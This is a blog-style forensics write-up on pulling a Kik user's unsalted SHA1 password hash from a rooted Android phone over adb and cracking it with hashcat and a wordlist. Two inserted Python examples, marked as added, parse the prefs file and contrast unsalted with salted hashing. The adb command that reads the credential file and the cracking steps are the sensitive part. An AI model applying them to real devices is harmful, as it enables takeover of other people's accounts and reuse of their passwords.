How to crack a Kik user’s password without rate limiting

Siddharth Dushantha
Dec 30, 2020

Kik is a messaging app for iOS and Android with millions of daily users. Even though it has allowed many people to connect with their friends across countries, it has also been used for notorious purposes. So a Kik user’s password can be crucial information for helping law enforcement solve criminal cases.

For this to work, there are 4 criteria:

  1. The device must be running Android
  2. Physical access is required
  3. The device has to be rooted
  4. User has to be logged in to Kik

I know what you are thinking. Why are there so many criteria!? Might as well add a 5th criterion stating that the user must be willing to hand over their password to you.

Well here is the thing. We are looking at this from a digital forensics point of view and not an unethical hacking point of view. When a seized device gets given to a digital forensics team, if possible it gets rooted so that more data can be recovered. A possible goal for an unethical hacker would be to somehow get into the account and cause harm. But our main goal today is to find what the Kik user’s password is because if they are someone who uses the same password in multiple places, it could reveal a lot of information.

Let the cracking begin…

In order to crack the password, you need 2 tools: adb, to pull the hash off the rooted device, and hashcat, to crack it.

Kik stores the user’s password as an unsalted SHA1 hash in /data/user/0/kik.android/shared_prefs/<long-string>.KikPreferences.xml, where <long-string> is a type 4 UUID. Therefore we can use hashcat along with a wordlist to crack the hash, which will reveal the password for the Kik user.

Once you have plugged in the device to your computer, use the command below to start the ADB server as root.

$ adb root

To make things easier, I have created the commands below to automate the process of fetching the hashed password:

$ XML_DATA=$(adb shell cat "/data/user/0/kik.android/shared_prefs/*.KikPreferences.xml")
$ echo "$XML_DATA" | grep "CredentialData\.password" | grep -Eo "[0-9a-f]{5,40}"

The first command reads the preferences file through the rooted adb shell (the glob is expanded on the device, so the UUID does not need to be known in advance); the second keeps only the line holding the CredentialData.password key and prints the hex digest from it.

For me, the result for the commands above was 0a66e107bb05fd282da95ef7155e7dd65e927894, which is of course the hashed password. Store this hash in a text file for later use:

$ echo 0a66e107bb05fd282da95ef7155e7dd65e927894 > hash.txt
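The grep pipeline above works, but for an evidence workflow you usually want the value tied to its key and checked for sanity before it goes anywhere near hashcat. The following is an added example, not code from the original post or from Kik: it parses a shared_prefs document in the standard Android layout (a <map> with typed child elements), pulls out the value stored under CredentialData.password (the key named in the post), and refuses anything that is not exactly 40 hex digits, which is the length of a SHA-1 digest. The file contents, the placeholder hash and the filler keys are constructed for the example; only the password key comes from the post.

```python
import re
import xml.etree.ElementTree as ET
from typing import Optional

# Constructed placeholder (40 hex digits, the length of a SHA-1 digest).
# It is not a real Kik artifact and does not correspond to any password.
PLACEHOLDER_HASH = "0123456789abcdef0123456789abcdef01234567"

# The preference key is the one the post greps for; the surrounding layout is
# the standard Android shared_prefs format (<map> with typed child elements).
PASSWORD_KEY = "CredentialData.password"

SHA1_HEX = re.compile(r"^[0-9a-f]{40}$")


def build_prefs_xml(password_value: str) -> str:
    """Build a constructed KikPreferences-style shared_prefs document.

    Only the password key is taken from the post; the other entries are
    made-up filler so the parser has neighbours to skip over.
    """
    return (
        "<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n"
        "<map>\n"
        '    <string name="CredentialData.username">example_user</string>\n'
        f'    <string name="{PASSWORD_KEY}">{password_value}</string>\n'
        '    <boolean name="example.flag" value="true" />\n'
        '    <int name="example.count" value="3" />\n'
        "</map>\n"
    )


def extract_password_hash(xml_text: str, key: str = PASSWORD_KEY) -> Optional[str]:
    """Return the SHA-1 hex digest stored under `key`, or None if the key is absent.

    Parsing the XML instead of grepping it keeps the value tied to its key,
    and the length check rejects a truncated or doubled digest (the kind of
    copy/paste damage hashcat would reject rather than crack).
    """
    root = ET.fromstring(xml_text)
    if root.tag != "map":
        raise ValueError("not an Android shared_prefs document (root is not <map>)")
    for entry in root.findall("string"):
        if entry.get("name") != key:
            continue
        value = (entry.text or "").strip().lower()
        if not SHA1_HEX.match(value):
            raise ValueError(f"value under {key!r} is not a 40-hex-digit SHA-1: {value!r}")
        return value
    return None


# Constructed sample document, built from the placeholder above.
SAMPLE_PREFS_XML = build_prefs_xml(PLACEHOLDER_HASH)

if __name__ == "__main__":
    # On a real case the text would come from `adb shell cat ...` instead.
    print("extracted:", extract_password_hash(SAMPLE_PREFS_XML))
```

Feeding the output of `adb shell cat` into `extract_password_hash` instead of the grep pipeline means a value that is the wrong length (for example one that was doubled in transit) is reported immediately, rather than being written to hash.txt and rejected by hashcat later.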

We can now use hashcat to crack this hash. I will be using the popular wordlist rockyou.txt which can be found with a quick Google search.

The annotated command below should give you an understanding of what each part of the command that we are using to crack the hash means.

$ hashcat --hash-type 100 --attack-mode 0 hash.txt rockyou.txt

  --hash-type 100    hashcat mode 100 is raw, unsalted SHA1, which is how Kik stores the password
  --attack-mode 0    "straight" mode: every entry in the wordlist is hashed as-is and compared
  hash.txt           the file holding the hash we extracted above
  rockyou.txt        the wordlist

The command above should give you an output similar to the one shown below, where the password that matches the hash is found.

If you take the password, which in my case is bandit, and try logging into the user’s account, you should be able to log in successfully without any issues.

Conclusion

The limitation of using this method is that the password must be in the wordlist, otherwise this will not work. There are many other ways in which we could crack the password of a Kik user, for example brute forcing through Kik’s login API, but this would most likely lead to rate limiting and a possible IP ban. This method of course does not by itself help you get into the account of a Kik user, but it does provide some good information for investigators.
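The reason the wordlist approach works at all is the storage scheme, not hashcat: an unsalted fast hash turns password recovery into a lookup that costs one SHA1 per candidate and can be shared across every account. The example below is added here and is not from the post or from Kik. It puts the scheme the post describes next to a hardened one (a random per-user salt plus PBKDF2, assumed for illustration only) and runs the same small dictionary check against both, counting the work each one costs. The wordlist is a constructed stand-in for rockyou.txt, the iteration count is lowered for the demo, and the hashed value is computed locally rather than taken from the post.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

# Constructed stand-in for a wordlist such as rockyou.txt: a handful of common
# passwords plus the one the post recovered.
WORDLIST = ["123456", "password", "qwerty", "bandit", "letmein"]

# Lowered for the demo; a production PBKDF2 deployment uses far more.
PBKDF2_ITERATIONS = 100_000


def sha1_unsalted(password: str) -> str:
    """The storage scheme the post describes: raw SHA-1, no salt, no work factor."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def lookup_unsalted(target: str, wordlist) -> Tuple[Optional[str], int]:
    """Dictionary check against an unsalted fast hash.

    Returns (matched word or None, number of SHA-1 computations). The table is
    built once and, because identical passwords give identical digests, it can
    be reused against every account extracted from every device.
    """
    table = {sha1_unsalted(w): w for w in wordlist}
    return table.get(target.lower()), len(wordlist)


def pbkdf2_store(password: str, salt: Optional[bytes] = None) -> dict:
    """Hardened scheme (assumed for illustration, not Kik's): a random per-user
    salt plus an iterated KDF, stored alongside the derived key."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return {"salt": salt, "iterations": PBKDF2_ITERATIONS, "dk": dk}


def pbkdf2_verify(password: str, record: dict) -> bool:
    """Constant-time comparison of a freshly derived key against the stored one."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), record["salt"], record["iterations"])
    return hmac.compare_digest(dk, record["dk"])


def lookup_salted(record: dict, wordlist) -> Tuple[Optional[str], int]:
    """The same dictionary check against the hardened record.

    Returns (matched word or None, number of PBKDF2 derivations performed).
    No table can be precomputed or shared: the salt forces one full derivation
    per candidate per account, and each derivation costs `iterations` HMAC calls.
    """
    derivations = 0
    for word in wordlist:
        derivations += 1
        if pbkdf2_verify(word, record):
            return word, derivations
    return None, derivations


if __name__ == "__main__":
    target = sha1_unsalted("bandit")  # computed here; not the digest from the post
    print("unsalted:", lookup_unsalted(target, WORDLIST))
    record = pbkdf2_store("bandit")
    word, n = lookup_salted(record, WORDLIST)
    print(f"salted: {word} after {n} derivations x {record['iterations']} iterations")
```

The password in the wordlist is still found in both cases, which is the limitation the paragraph above describes. What changes is the cost and the reuse: the unsalted table is one SHA1 per word and serves every account, while the salted record has to be attacked separately per user at `iterations` HMAC calls per guess, and two users with the same password no longer share a stored value.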

Thank you for reading and I hope you enjoyed reading this writeup!
